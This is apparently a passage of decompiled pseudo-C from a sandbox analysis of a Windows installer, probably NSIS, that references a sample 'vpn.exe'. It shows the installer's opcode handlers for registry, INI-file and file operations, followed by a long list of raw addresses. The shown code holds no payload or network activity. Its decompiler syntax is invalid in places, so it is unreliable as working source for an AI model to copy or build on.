						__eflags = _v44 - __ebx;
						if(_v44 != __ebx) {
							_v24 = E0040145C(__edx, 0x11);
						}
						__eflags = _v36.dwHighDateTime - __ebx;
						if(_v36.dwHighDateTime != __ebx) {
							_a4 = E0040145C(__edx, 0x22);
						}
						__ebx = E0040145C(__edx, 0xffffffcd);
						_push(__ebx);
						_push(__edi);
						_push(__esi);
						__eax = E004062CF(L"WriteINIStr: wrote [%s] %s=%s in %s", L"\"C:\\Users\\alfons\\AppData\\Local\\Temp\\New Feature\\vpn.exe\"");
						__eax = WritePrivateProfileStringW(_v20, _v24, _a4, __ebx);
						goto L65;
					case 0x30:
						__eax =  *L"!N~"; // 0x4e0021
						_v96.fAnyOperationsAborted = __eax;
						__eax =  *0x409590; // 0x7e
						_v96.hNameMappings = __eax;
						__edi = E0040145C(__edx, 1);
						__ebx = E0040145C(__edx, 0x12);
						E0040145C(__edx, 0xffffffdd) =  &(_v96.fAnyOperationsAborted);
						GetPrivateProfileStringW(__edi, __ebx,  &(_v96.fAnyOperationsAborted), __esi, 0x2003,  &(_v96.fAnyOperationsAborted)) =  &(_v96.fAnyOperationsAborted);
						__eax = lstrcmpW(__esi,  &(_v96.fAnyOperationsAborted));
						L62:
						__eflags = __eax;
						if(__eax != 0) {
							goto L430;
						}
						goto L63;
					case 0x31:
						_a4 = E004061EC(__ecx);
						__eflags = _v36.dwHighDateTime;
						if(_v36.dwHighDateTime != 0) {
							__eax = E0040145C(__edx, 0x22);
							__esi = __eax;
							_push(__eax);
							__eax = E004062CF(L"DeleteRegKey: \"%s\\%s\"", _a4);
							__eax = _v44;
							__eflags = __eax;
							if(__eax == 0) {
								 *0x47eb64 =  *0x47eb64 + 0x80000001;
								__eflags =  *0x47eb64 + 0x80000001;
							}
							_v36.dwHighDateTime = _v36.dwHighDateTime & 0x00000002;
							__eflags = _v36.dwHighDateTime & 0x00000002;
							_v24 = __eax;
							L276:
							__eflags = _v24 - __ebx;
							if(_v24 == __ebx) {
								goto L430;
							}
							goto L67;
						}
						__edi = E00401553(2);
						__eflags = __edi;
						if(__edi == 0) {
							goto L67;
						}
						__esi = E0040145C(__edx, 0x33);
						__eax = RegDeleteValueW(__edi, __esi);
						_push(__esi);
						_push(0x4140f8);
						_v24 = __eax;
						E004062CF(L"DeleteRegValue: \"%s\\%s\" \"%s\"", _a4) = RegCloseKey(__edi);
						goto L276;
					case 0x32:
						__eflags = __edx;
						if(__edx == 0) {
							__edi =  *0x47eb64;
							__edi =  *0x47eb64 + 0x80000001;
							__eflags = __edi;
						} else {
							__edi = __edx;
						}
						__eax = _v36.dwHighDateTime;
						_v20 = _v36.dwHighDateTime;
						__eax = _v28;
						_v24 = _v28;
						_v16 = E0040145C(__edx, 2);
						_a4 = E0040145C(__edx, 0x11);
						_v56 = E004061EC(__edi);
						 &(_v96.hNameMappings) =  *0x47eb90;
						__eax =  *0x47eb90 | 0x00000002;
						0 = 1;
						_v8 = 1;
						__eax = RegCreateKeyExW(__edi, _a4, __ebx, __ebx, __ebx,  *0x47eb90 | 0x00000002, __ebx,  &(_v96.hNameMappings), __ebx);
						__eflags = __eax;
						if(__eax != 0) {
							_push(_a4);
							_push(_v56);
							_push(L"WriteReg: error creating key \"%s\\%s\"");
							L87:
							__eax = E004062CF();
							L88:
							__esp = __esp + 0xc;
							goto L430;
						} else {
							_v12 = __ebx;
							__edi = 0x4140f8;
							__eflags = _v20 - 1;
							if(_v20 != 1) {
								L286:
								_push(4);
								_pop(__esi);
								__eflags = _v20 - __esi;
								if(_v20 == __esi) {
									_push(3);
									_pop(__ecx);
									__eax = E00401446(__ecx);
									_push(__eax);
									_push(_v16);
									 *0x4140f8 = __eax;
									_push(_a4);
									_v12 = __esi;
									__eax = E004062CF(L"WriteRegDWORD: \"%s\\%s\" \"%s\"=\"0x%08x\"", _v56);
								}
								__eflags = _v20 - 3;
								if(_v20 == 3) {
									_v12 = E0040337F(_v36.dwLowDateTime, __ebx, __edi, 0xc018);
									 &_v352 = E00406250(__ecx,  &_v352, 0x100, __edi,  &_v352);
									__eax =  &_v352;
									_push( &_v352);
									_push(_v16);
									_push(_a4);
									__eax = E004062CF(L"WriteRegBin: \"%s\\%s\" \"%s\"=\"%s\"", _v56);
								}
								L290:
								__eax = RegSetValueExW(_v96.hNameMappings, _v16, __ebx, _v24, __edi, _v12);
								__eflags = __eax;
								if(__eax != 0) {
									_push(_v16);
									_push(_a4);
									__eax = E004062CF(L"WriteReg: error writing into \"%s\\%s\" \"%s\"", _v56);
								} else {
									_v8 = __ebx;
								}
								_push(_v96.hNameMappings);
								goto L294;
							}
							__eax = E0040145C(__edx, 0x23);
							__eax = lstrlenW(0x4140f8);
							_push(0x4140f8);
							_push(_v16);
							__eax = __eax +  &(__eax[1]);
							_push(_a4);
							_v12 = __eax;
							_push(_v56);
							__eflags = _v24 - 1;
							if(_v24 != 1) {
								_push(L"WriteRegExpandStr: \"%s\\%s\" \"%s\"=\"%s\"");
								__eax = E004062CF();
								__esp = __esp + 0x14;
								goto L286;
							}
							_push(L"WriteRegStr: \"%s\\%s\" \"%s\"=\"%s\"");
							__eax = E004062CF();
							__esp = __esp + 0x14;
							goto L290;
						}
					case 0x33:
						__edi = E00401553(0x20019);
						__eax = E0040145C(__edx, 0x33);
						__ecx = 0;
						 *__esi = __cx;
						__eflags = __edi;
						if(__edi == 0) {
							goto L67;
						}
						 &(_v96.hNameMappings) =  &_a4;
						_v96.hNameMappings = 0x4008;
						__eax = RegQueryValueExW(__edi, __eax, 0,  &_a4, __esi,  &(_v96.hNameMappings));
						__ecx = 0;
						__ecx = 1;
						__eflags = __eax;
						if(__eax != 0) {
							L303:
							__eax = 0;
							__eflags = 0;
							 *__esi = __ax;
							_v8 = __ecx;
							goto L304;
						}
						__eflags = _a4 - 4;
						if(_a4 == 4) {
							__eax = 0;
							__eflags = _v36.dwHighDateTime;
							__eax = 0 | __eflags == 0x00000000;
							_v8 = __eflags == 0;
							__eax = E00405F7D(__esi,  *__esi);
							goto L304;
						}
						__eflags = _a4 - 1;
						if(_a4 == 1) {
							L301:
							__eax = _v36.dwHighDateTime;
							__ecx = _v96.hNameMappings;
							_v8 = _v36.dwHighDateTime;
							__eax = 0;
							__esi[_v96.hNameMappings] = __ax;
							goto L304;
						}
						__eflags = _a4 - 2;
						if(_a4 != 2) {
							goto L303;
						}
						goto L301;
					case 0x34:
						__eax = E00401553(0x20019);
						_push(3);
						_pop(__ecx);
						__edi = __eax;
						__eax = E00401446(__ecx);
						__ecx = 0;
						 *__esi = __cx;
						__eflags = __edi;
						if(__edi == 0) {
							goto L67;
						}
						__ecx = 0x2003;
						_a4 = 0x2003;
						__eflags = _v36.dwHighDateTime;
						if(_v36.dwHighDateTime == 0) {
							__ecx =  &_a4;
							__eax = RegEnumValueW(__edi, __eax, __esi,  &_a4, 0, 0, 0, 0);
							__eflags = __eax;
							if(__eax != 0) {
								goto L67;
							}
							L309:
							__eax = 0;
							__esi[0x2003] = __ax;
							L304:
							_push(__edi);
							L294:
							__eax = RegCloseKey();
							goto L430;
						}
						__eax = RegEnumKeyW(__edi, __eax, __esi, 0x2003);
						goto L309;
					case 0x35:
						__eflags =  *__esi - __bx;
						_push(ds);
						if(__eflags != 0) {
							_push(E00405F96(__ecx, __esi));
							L313:
							__eax = CloseHandle();
						}
						goto L430;
					case 0x36:
						__eax = E0040145C(__edx, 0xffffffed);
						__eax = E00405E7C(__eax, _v44, _v40);
						__eflags = __eax - 0xffffffff;
						if(__eax != 0xffffffff) {
							goto L427;
						}
						goto L315;
					case 0x37:
						__edi = 0x2004;
						_a4 = GlobalAlloc(0x40, 0x2004);
						__eflags = _v40;
						if(_v40 == 0) {
							E0040145C(__edx, 0x11) = WideCharToMultiByte(0, 0, 0x4100f0, 0xffffffff, _a4, 0x2004, 0, 0);
							__eax = lstrlenA(_a4);
						} else {
							__ecx = 0;
							__ecx = 1;
							__eax = E00401446(1);
							__ecx = _a4;
							 *_a4 = __al;
							0 = 1;
						}
						__eflags =  *__esi - __bx;
						if( *__esi == __bx) {
							L321:
							_v8 = 1;
							goto L219;
						} else {
							__ecx =  &(_v96.hNameMappings);
							__eax = E00405F96(__ecx, __esi);
							__eax = WriteFile(__eax, _a4, __eax, __ecx, __ebx);
							__eflags = __eax;
							if(__eax != 0) {
								L219:
								_push(_a4);
								L220:
								__eax = GlobalFree();
								goto L430;
							}
							goto L321;
						}
					case 0x38:
						_push(2);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						_v12 = __eax;
						__eflags = __eax - 1;
						if(__eax < 1) {
							goto L430;
						}
						__ecx = 0x2003;
						__eflags = __eax - 0x2003;
						if(__eax > 0x2003) {
							_v12 = 0x2003;
						}
						__eflags =  *__esi - __bx;
						if( *__esi == __bx) {
							goto L345;
						} else {
							_v61 = __bl;
							_v96.hNameMappings = E00405F96(__ecx, __esi);
							__eflags = _v12 - __ebx;
							if(_v12 <= __ebx) {
								goto L345;
							}
							__esi = __ebx;
							while(1) {
								 &_v24 =  &_a7;
								__eax = ReadFile(_v96.hNameMappings,  &_a7, 1,  &_v24, __ebx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L346;
								}
								__eflags = _v24 - 1;
								if(_v24 != 1) {
									goto L346;
								}
								__eflags = _v36.dwLowDateTime - __ebx;
								if(_v36.dwLowDateTime != __ebx) {
									__eax = _a7 & 0x000000ff;
									goto L337;
								}
								 &_v16 =  &_a7;
								__eax = MultiByteToWideChar(__ebx, __ebx,  &_a7, 1,  &_v16, 2);
								__al = _v61;
								__eflags = __al - 0xd;
								if(__al == 0xd) {
									L338:
									__eflags = __al - _a7;
									if(__al == _a7) {
										L343:
										_push(1);
										_push(__ebx);
										_push(0xffffffff);
										goto L344;
									}
									__eflags = _a7 - 0xd;
									if(_a7 == 0xd) {
										L341:
										__ax = _v16;
										goto L342;
									}
									__eflags = _a7 - 0xa;
									if(_a7 != 0xa) {
										goto L343;
									}
									goto L341;
								}
								__eflags = __al - 0xa;
								if(__al == 0xa) {
									goto L338;
								}
								__ax = _v16;
								 *(__edi + __esi * 2) = __ax;
								__al = _a7;
								__esi =  &(__esi[0]);
								_v61 = __al;
								__eflags = __al - __bl;
								if(__al == __bl) {
									goto L346;
								}
								__eflags = __esi - _v12;
								if(__esi < _v12) {
									continue;
								}
								goto L346;
							}
							goto L346;
						}
					case 0x39:
						__eflags = _v40;
						if(_v40 == 0) {
							__eax = E0040145C(__edx, 0x11);
							__eax = lstrlenW(__eax);
						} else {
							__ecx = 0;
							__ecx = 1;
							__eax = E00401446(1);
							 *0x4100f0 = __ax;
							__eax = 0;
							__eax = 1;
						}
						__eflags =  *__esi - __bx;
						if( *__esi == __bx) {
							goto L67;
						} else {
							__ecx =  &_a4;
							__eax = __eax + __eax;
							__eax = E00405F96(__ecx, __esi);
							__eax = WriteFile(__eax, 0x4100f0, __eax, __ecx, __ebx);
							L65:
							__eflags = __eax;
							goto L66;
						}
					case 0x3a:
						_push(2);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						_v12 = __eax;
						__eflags = __eax - 1;
						if(__eax < 1) {
							goto L430;
						}
						__ecx = 0x2003;
						__eflags = __eax - 0x2003;
						if(__eax > 0x2003) {
							_v12 = 0x2003;
						}
						__eflags =  *__esi - __bx;
						if( *__esi == __bx) {
							L345:
							__esi = __ebx;
							goto L346;
						} else {
							_v56 = __ebx;
							_v96.hNameMappings = E00405F96(__ecx, __esi);
							__eflags = _v12 - __ebx;
							if(_v12 <= __ebx) {
								goto L345;
							}
							__esi = __ebx;
							while(1) {
								 &_v24 =  &_a4;
								__eax = ReadFile(_v96.hNameMappings,  &_a4, 2,  &_v24, __ebx);
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__eflags = _v24 - 2;
								if(_v24 != 2) {
									break;
								}
								__eflags = _v36.dwLowDateTime - __ebx;
								if(_v36.dwLowDateTime != __ebx) {
									__eax = _a4 & 0x0000ffff;
									L337:
									__eax = E00405F7D(__edi, __eax);
									goto L431;
								}
								__eflags = _v56 - 0xd;
								if(_v56 == 0xd) {
									L367:
									__ax = _a4;
									__eflags = _v56 - __ax;
									if(_v56 == __ax) {
										L370:
										_push(1);
										_push(__ebx);
										_push(0xfffffffe);
										L344:
										__eax = SetFilePointer(_v96.hNameMappings, ??, ??, ??);
										break;
									}
									__eflags = __ax - 0xd;
									if(__ax == 0xd) {
										L342:
										 *(__edi + __esi * 2) = __ax;
										__esi =  &(__esi[0]);
										break;
									}
									__eflags = __ax - 0xa;
									if(__ax == 0xa) {
										goto L342;
									}
									goto L370;
								}
								__eflags = _v56 - 0xa;
								if(_v56 == 0xa) {
									goto L367;
								}
								__ax = _a4;
								__ecx = __ax & 0x0000ffff;
								 *(__edi + __esi * 2) = __ax;
								__esi =  &(__esi[0]);
								_v56 = __ax & 0x0000ffff;
								__eflags = __ax - __bx;
								if(__ax == __bx) {
									break;
								}
								__eflags = __esi - _v12;
								if(__esi < _v12) {
									continue;
								}
								break;
							}
							L346:
							__eax = 0;
							 *(__edi + __esi * 2) = __ax;
							__eflags = __esi - __ebx;
							L66:
							if(__eflags != 0) {
								goto L430;
							}
							goto L67;
						}
					case 0x3b:
						__eflags =  *__esi - __bx;
						_push(ds);
						if(__eflags == 0) {
							goto L430;
						} else {
							_push(_v36.dwLowDateTime);
							_push(0);
							_push(2);
							_pop(__ecx);
							__eax = E00401446(__ecx);
							__eax = E00405F96(__ecx, __esi);
							__eax = SetFilePointer(__eax, __eax, ??, ??);
							__eflags = _v44;
							if(_v44 < 0) {
								goto L430;
							}
							goto L374;
						}
					case 0x3c:
						__eflags =  *__esi - __bx;
						_push(ds);
						if(__eflags != 0) {
							E00405F96(__ecx, __esi) = FindClose(__eax);
						}
						goto L430;
					case 0x3d:
						__eflags =  *__edi - __bx;
						if( *__edi == __bx) {
							L63:
							__eax = 0;
							_v8 = 1;
							 *__esi = __ax;
							goto L430;
						}
						__eax =  &_v944;
						__eax = E00405F96(__ecx, __edi);
						__eax = FindNextFileW(__eax,  &_v944);
						__eflags = __eax;
						if(__eax == 0) {
							goto L63;
						}
						goto L385;
					case 0x3e:
						__eax = E0040145C(__edx, 2);
						__ecx =  &_v944;
						__eax = FindFirstFileW(__eax,  &_v944);
						__eflags = __eax - 0xffffffff;
						if(__eax != 0xffffffff) {
							__eax = E00405F7D(__edi, __eax);
							L385:
							__eax =  &(_v944.cFileName);
							_push( &(_v944.cFileName));
							_push(__esi);
							goto L386;
						}
						__eax = 0;
						 *__edi = __ax;
						L315:
						__eax = 0;
						 *__esi = __ax;
						goto L67;
					case 0x3f:
						_v20 = 0xfffffd66;
						__eax = E0040145C(__edx, 0xfffffff0);
						__esi = __eax;
						_v24 = __eax;
						__eax = E00405D51(__eax);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E0040145C(__edx, 0xffffffed);
						}
						__eax = E00405E5C(__esi);
						__eax = E00405E7C(__esi, 0x40000000, 2);
						_a4 = __eax;
						__eflags = __eax - 0xffffffff;
						if(__eax == 0xffffffff) {
							L398:
							_push(_v24);
							__eax = E004062CF(L"created uninstaller: %d, \"%s\"", _v20);
							_push(0xfffffff3);
							_pop(__esi);
							__eflags = _v20 - __ebx;
							if(_v20 < __ebx) {
								_push(0xffffffef);
								_pop(__esi);
								__eax = DeleteFileW(_v24);
								_v8 = 1;
							}
							__eax = E00401435(__esi);
							goto L430;
						} else {
							__eax =  *0x47eb0c;
							__esi = GlobalAlloc;
							_v96.hNameMappings = __eax;
							__edi = __eax;
							__eflags = __edi - __ebx;
							if(__edi == __ebx) {
								L397:
								__eax = CloseHandle(_a4);
								goto L398;
							}
							E00403368(__ebx) = E00403336(__edi, _v96.hNameMappings);
							0 = GlobalAlloc(0x40, _v40);
							_v20 = __esi;
							__eflags = __esi - __ebx;
							if(__esi == __ebx) {
								L396:
								 &_v12 = WriteFile(_a4, __edi, _v96.hNameMappings,  &_v12, __ebx);
								__eax = GlobalFree(__edi);
								_v20 = E0040337F(0xffffffff, _a4, __ebx, __ebx);
								goto L397;
							}
							__eax = E0040337F(_v44, __ebx, __esi, _v40);
							while(1) {
								__eflags =  *__esi - __bl;
								if( *__esi == __bl) {
									break;
								}
								__ecx =  *__esi;
								__eax = __esi[2];
								__esi =  &(__esi[4]);
								__eax = __eax + __edi;
								_v60 = __ecx;
								__eax = E00405E38(__eax, __esi, __ecx);
								__esi = __esi + _v60;
								__eflags = __esi;
							}
							__eax = GlobalFree(_v20);
							goto L396;
						}
					case 0x40:
						__eflags = __edx;
						if(__edx == 0) {
							_push(E0040145C(__edx, 1));
							_push(L"%s");
							L52:
							__eax = E004062CF();
							_pop(__ecx);
							L27:
							_pop(__ecx);
							goto L430;
						}
						E004062CF(L"settings logging to %d", __ecx) = _v44;
						 *0x46d204 = _v44;
						__eax = E004062CF(L"logging set to %d", _v44);
						__eflags = _v44;
						if(_v44 == 0) {
							__eax = E00406113(__ecx, 1);
						} else {
							__eax = E00403EA0();
						}
						goto L430;
					case 0x41:
						__ecx = 0;
						__eax = E00401446(0);
						_a4 = __eax;
						__eflags = __eax -  *0x47eacc;
						if(__eax >=  *0x47eacc) {
							goto L67;
						}
						__esi = __eax;
						__eax = _v40;
						__esi = __esi * 0x4020;
						__esi = __esi +  *0x47eac8;
						__eflags = __eax;
						if(__eflags < 0) {
							0xffffffff = 0xffffffff - __eax;
							__eflags = 0xffffffff;
							_v40 = 0xffffffff - __eax;
							if(0xffffffff == 0) {
								_t480 =  &(__esi[0xc]); // -4713136
								_t480 = E00406831(__ebx, __edi, 0, _t480, _v36.dwHighDateTime);
								_t481 =  &(__esi[4]);
								 *_t481 = __esi[4] | 0x00000100;
								__eflags =  *_t481;
							} else {
								__ecx = 0;
								__ecx = 1;
								_v44 = E00401446(1);
							}
							__eax = _v40;
							__ecx = _v44;
							 *((intOrPtr*)(__esi + _v40 * 4)) = _v44;
							__eflags = _v36.dwLowDateTime - __ebx;
							if(_v36.dwLowDateTime != __ebx) {
								__eax = E00401186(_a4);
							}
							goto L430;
						}
						__ecx =  *(__esi + __eax * 4);
						if(__eflags != 0) {
							_push(__ecx);
							goto L375;
						}
						_push(0);
						_push(__edi);
						L386:
						__eax = E00406035();
						goto L430;
					case 0x42:
						__ecx = 0;
						__eax = E00401446(0);
						__eflags = __eax - 0x20;
						if(__eax >= 0x20) {
							L67:
							_v8 = 1;
							goto L430;
						}
						__eflags = _v36.dwLowDateTime;
						if(_v36.dwLowDateTime == 0) {
							__eflags = _v40;
							if(_v40 == 0) {
								__ecx =  *0x47eabc;
								__eax = E00406831(__ebx, __edi, __esi, __edi,  *( *0x47eabc + 0x94 + __eax * 4));
							} else {
								__ecx = _v44;
								__edx =  *0x47eabc;
								 *( *0x47eabc + 0x94 + __eax * 4) = _v44;
							}
							goto L430;
						}
						__eflags = _v40;
						if(_v40 == 0) {
							__eax = E004012F1(0);
							L374:
							_push(__eax);
							L375:
							_push(__edi);
							goto L429;
						}
						__eax = E004011F8(__ecx, 0, 0);
						goto L430;
					case 0x43:
						goto L430;
					case 0x44:
						 *0x461dcc =  *0x461dcc & __edx;
						__eax = SendMessageW(_v16, 0xb,  *0x461dcc & __edx, 0);
						__eflags = _v48;
						if(_v48 != 0) {
							__eax = InvalidateRect(_v16, 0, 0);
						}
						goto L430;
					case 0x45:
						__eax = E0040145C(__edx, 1);
						__eax = E004063D8(__eax);
						L427:
						_push(__eax);
						L428:
						_push(__esi);
						L429:
						__eax = E00405F7D();
						goto L430;
				}
			}

0x004015b6
0x004015ba
0x004015bc
0x004015d2
0x004015e1
0x004015eb
0x004015ee
0x004015f4
0x004030e3
0x004030e6
0x004030ec
0x00000000
0x004030ec
0x004015fa
0x00000000
0x00401607
0x00000000
0x00000000
0x00401622
0x00401627
0x00401628
0x00401629
0x0040162a
0x00000000
0x00000000
0x0040163c
0x00401642
0x00401645
0x00401648
0x00401648
0x00000000
0x00000000
0x00401656
0x00401656
0x0040165f
0x00401664
0x00401665
0x00401666
0x00000000
0x00000000
0x0040167e
0x00401683
0x00401684
0x00401685
0x00401686
0x00000000
0x00000000
0x00401693
0x0040169a
0x004016a2
0x004016a7
0x004016a8
0x004016a9
0x004016ac
0x004016ae
0x004016b0
0x004016b0
0x004016b0
0x004016b2
0x00000000
0x00000000
0x004016bd
0x004016c2
0x004016c7
0x004016cb
0x00000000
0x00000000
0x00401742
0x00401747
0x0040174d
0x0040174f
0x00401753
0x00401755
0x00401755
0x00401758
0x0040175d
0x0040175f
0x00401767
0x00401767
0x00000000
0x00000000
0x00401770
0x00401775
0x00401778
0x00401780
0x0040178c
0x00401792
0x00401794
0x00000000
0x0040179a
0x0040179a
0x004017a1
0x00000000
0x004017a1
0x00000000
0x004017b3
0x004017b8
0x004017bb
0x004017c4
0x004017d4
0x004017d6
0x004017d8
0x00401864
0x00401864
0x00401869
0x0040186c
0x00401890
0x00000000
0x0040186e
0x0040186e
0x0040187d
0x00401885
0x00000000
0x00401885
0x00000000
0x00000000
0x00000000
0x004017de
0x004017de
0x004017e6
0x004017e8
0x004017ef
0x004017f1
0x004017f4
0x004017fa
0x004017fc
0x0040184e
0x00401853
0x00401853
0x00401854
0x00000000
0x00401854
0x004017fe
0x00401804
0x00401809
0x0040182a
0x00401830
0x00401832
0x00000000
0x00401834
0x0040183c
0x00401841
0x00000000
0x00401841
0x0040180b
0x00401811
0x0040181a
0x00401822
0x00401822
0x00401855
0x00401855
0x00401858
0x0040185b
0x0040185b
0x00000000
0x00000000
0x0040189d
0x004018a0
0x004018a5
0x004018a7
0x004018c2
0x004018cb
0x00000000
0x004018a9
0x004018a9
0x004018b2
0x00000000
0x004018b7
0x00000000
0x004016d6
0x004016d8
0x004016db
0x00401702
0x00401709
0x004016dd
0x004016dd
0x004016e4
0x004016eb
0x004016ed
0x004016ee
0x004016f3
0x004016f6
0x004016f6
0x00000000
0x00000000
0x00401715
0x00401718
0x0040171f
0x00401721
0x00401723
0x00401725
0x0040172b
0x00000000
0x00000000
0x00401736
0x00000000
0x00000000
0x004018e4
0x004018ed
0x004018f5
0x004018fd
0x00401902
0x00401903
0x00401908
0x0040190e
0x00401910
0x0040191e
0x00401921
0x0040194a
0x0040194a
0x0040194b
0x00000000
0x0040194b
0x00401924
0x00401929
0x0040192b
0x00000000
0x0040192d
0x0040193d
0x00401942
0x00401943
0x00000000
0x00401943
0x00401912
0x00401912
0x00401917
0x00000000
0x00401917
0x00000000
0x00401968
0x0040196a
0x00401975
0x0040197b
0x0040197d
0x004019a3
0x004019a3
0x004019a3
0x004019a5
0x004019a8
0x004019af
0x004019af
0x004019b2
0x004019bf
0x004019bf
0x00000000
0x004019b2
0x0040197f
0x00401982
0x00401984
0x00000000
0x00000000
0x00401986
0x00401989
0x00000000
0x00000000
0x0040198c
0x00401991
0x00401993
0x00000000
0x00000000
0x0040199c
0x00000000
0x00000000
0x004019cc
0x004019d1
0x004019de
0x00000000
0x00000000
0x004019ff
0x00401a06
0x00000000
0x00000000
0x00401a26
0x00401a28
0x00401a2b
0x00401a2d
0x00401a30
0x00401a31
0x00401a34
0x00401a37
0x00401a3e
0x00401a41
0x00401a44
0x00401a4d
0x00401a52
0x00401a53
0x00401a58
0x00401a5a
0x00401a6a
0x00401a76
0x00401a5c
0x00401a5c
0x00401a5d
0x00401a5d
0x00401a7c
0x00401a81
0x00401a86
0x00401a86
0x00401a8a
0x00401a8d
0x00401a92
0x00401a94
0x00401a96
0x00401a98
0x00401a9c
0x00401a9c
0x00401aa6
0x00401aa6
0x00401aab
0x00401ab3
0x00401ab5
0x00401ab7
0x00401ab9
0x00401ab9
0x00401aba
0x00401aba
0x00401abd
0x00401ac0
0x00401ac3
0x00401ac3
0x00401ac8
0x00401aca
0x00401ad1
0x00401ad9
0x00401ade
0x00401ae1
0x00401ae4
0x00000000
0x00000000
0x00401aea
0x00401aed
0x00401b6b
0x00401b70
0x00401b74
0x00401b76
0x00401b76
0x00401b7d
0x00401b80
0x00401b81
0x00000000
0x00401b81
0x00401af5
0x00401afa
0x00401afb
0x00401b0d
0x00401b25
0x00401b2d
0x00401b36
0x00401b3b
0x00401b3b
0x00401b3e
0x00401b50
0x00401b50
0x00401b51
0x00401b93
0x00401b98
0x00401b9d
0x00401ba3
0x00000000
0x00401ba3
0x00401b53
0x00401b58
0x00401b5d
0x00401b5e
0x00401b5f
0x0040162d
0x0040162d
0x00000000
0x0040162d
0x00401b40
0x00401b45
0x00401b4a
0x00401b4a
0x00401bae
0x00401bb3
0x00401bc1
0x00401bc6
0x00401bcc
0x00401bce
0x00401bd5
0x00401bdd
0x00401be1
0x00401be9
0x00401bf2
0x00401bf8
0x00401bfb
0x00401c01
0x00401c03
0x00000000
0x00000000
0x00401c09
0x00401c0c
0x00401c24
0x00401c0e
0x00401c1a
0x00401c1a
0x00401c2f
0x00401c34
0x00401c35
0x00401c36
0x00401c3b
0x00000000
0x00401c3b
0x00401be3
0x00401be7
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c47
0x00401c4c
0x00401c4e
0x00401c4f
0x00000000
0x00000000
0x00401c6b
0x00401c70
0x00401c72
0x00401c7b
0x00401c87
0x00401c8c
0x00401c8e
0x00000000
0x00000000
0x00401c94
0x00401c97
0x00401ca1
0x00401ca4
0x00000000
0x00000000
0x00401caa
0x00000000
0x00401caa
0x00000000
0x00000000
0x00401cb4
0x00401cb9
0x00401cbb
0x00401cbc
0x00401c54
0x00401c54
0x00401c59
0x00401c5a
0x00401c5f
0x00000000
0x00000000
0x00401cc5
0x00401ccb
0x00000000
0x00000000
0x00401cd5
0x00401cd7
0x00401cd8
0x00401cdd
0x00401cdf
0x00401ce0
0x00401cea
0x00401cec
0x00401cf1
0x00401cf3
0x00401cf6
0x00401cf9
0x00401cfc
0x00401d07
0x00401d08
0x00401d0d
0x00401d0f
0x00401d19
0x00401d19
0x00401d1b
0x00401d1d
0x00401d1d
0x00401d22
0x00401d27
0x00401d2c
0x00401d2f
0x00401d31
0x00401d37
0x00401d3f
0x00401d3f
0x00401d41
0x00401d43
0x00401d43
0x00401d41
0x00401d45
0x00401d4b
0x00401d51
0x00401d53
0x00401d53
0x00401d4b
0x00000000
0x00401d31
0x00401d11
0x00401d11
0x00401d13
0x00000000
0x00000000
0x00000000
0x00401d13
0x00401cfe
0x00401d01
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d65
0x00401d6c
0x00401d6d
0x00401d6e
0x00401d71
0x00401d86
0x00401d73
0x00401d73
0x00401d73
0x00401d79
0x00401d7b
0x00000000
0x00401d81
0x00000000
0x00401d81
0x00000000
0x00401d9a
0x00401d9e
0x00401da4
0x00401da6
0x00401db9
0x00401db9
0x00401db9
0x00401dbb
0x00401dc2
0x00401dc5
0x00401dc5
0x00401dc7
0x00000000
0x00401dc7
0x00401da8
0x00401dab
0x00000000
0x00000000
0x00401daf
0x00401db5
0x00401db7
0x00000000
0x00000000
0x00000000
0x00000000
0x00401dd3
0x00401dd5
0x00401dda
0x00401ddc
0x00401ddd
0x00401ddf
0x00401de4
0x00401de7
0x00401dff
0x00401e01
0x00401c99
0x00401c99
0x00000000
0x00401c99
0x00401e07
0x00000000
0x00000000
0x00401df7
0x00401df7
0x00000000
0x00401df7
0x00401de9
0x00401deb
0x00000000
0x00000000
0x00401df1
0x00000000
0x00000000
0x00000000
0x00000000
0x00401e0f
0x00401e11
0x00401e12
0x00401e17
0x00401e19
0x00401e1a
0x00401e21
0x00401e23
0x00401e26
0x00401e29
0x00401e94
0x00401e94
0x00000000
0x00401e94
0x00401e2b
0x00000000
0x00401e32
0x00000000
0x00000000
0x00401e36
0x00000000
0x00000000
0x00401e3a
0x00000000
0x00000000
0x00401e3f
0x00401e41
0x00000000
0x00000000
0x00401e43
0x00401e45
0x00401e46
0x00401e46
0x00401e46
0x00000000
0x00000000
0x00401e55
0x00000000
0x00000000
0x00401e59
0x00000000
0x00000000
0x00401e5d
0x00000000
0x00000000
0x00401e61
0x00401e63
0x00401e65
0x00401e65
0x00401e65
0x00401e68
0x00401e68
0x00000000
0x00000000
0x00401e6c
0x00401e6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00401e79
0x00401e7b
0x00401e70
0x00401e70
0x00401e72
0x00000000
0x00000000
0x00401e74
0x00401e74
0x00401e76
0x00000000
0x00401e76
0x00401e7d
0x00401e7d
0x00000000
0x00000000
0x00401e81
0x00401e83
0x00401e4a
0x00401e4a
0x00401e4c
0x00000000
0x00401e4c
0x00401e85
0x00401e87
0x00401e88
0x00401e88
0x00401e88
0x00401e8a
0x00000000
0x00000000
0x00401e8e
0x00000000
0x00000000
0x00401e92
0x00000000
0x00000000
0x00000000
0x00401e9c
0x00401ea1
0x00401ea3
0x00401ea4
0x00401eae
0x00000000
0x00000000
0x00401eb9
0x00401ebc
0x00401ec2
0x00401ec4
0x00401f24
0x00401f26
0x00401f5a
0x00401f63
0x00401f65
0x00401f69
0x00401f6e
0x00401f73
0x00401f75
0x00000000
0x00401f75
0x00401f28
0x00401f2a
0x00401f3c
0x00401f41
0x00401f46
0x00401f48
0x00401f4d
0x00000000
0x00401f4d
0x00401f2c
0x00401f31
0x00401f36
0x00000000
0x00000000
0x00000000
0x00000000
0x00401ec6
0x00401ec6
0x00401ec6
0x00401ec7
0x00401ec9
0x00000000
0x00000000
0x00401ecb
0x00401ecd
0x00401ecf
0x00000000
0x00000000
0x00401ed1
0x00401ed3
0x00401ef7
0x00401efb
0x00401f01
0x00401f06
0x00401f10
0x00401f15
0x00401f1a
0x00401f1e
0x00000000
0x00401f1e
0x00000000
0x00401ed3
0x00401edd
0x00401ee2
0x00401ee3
0x00000000
0x00000000
0x00401f80
0x00401f82
0x00401f83
0x00401f88
0x00401f8a
0x00401f8b
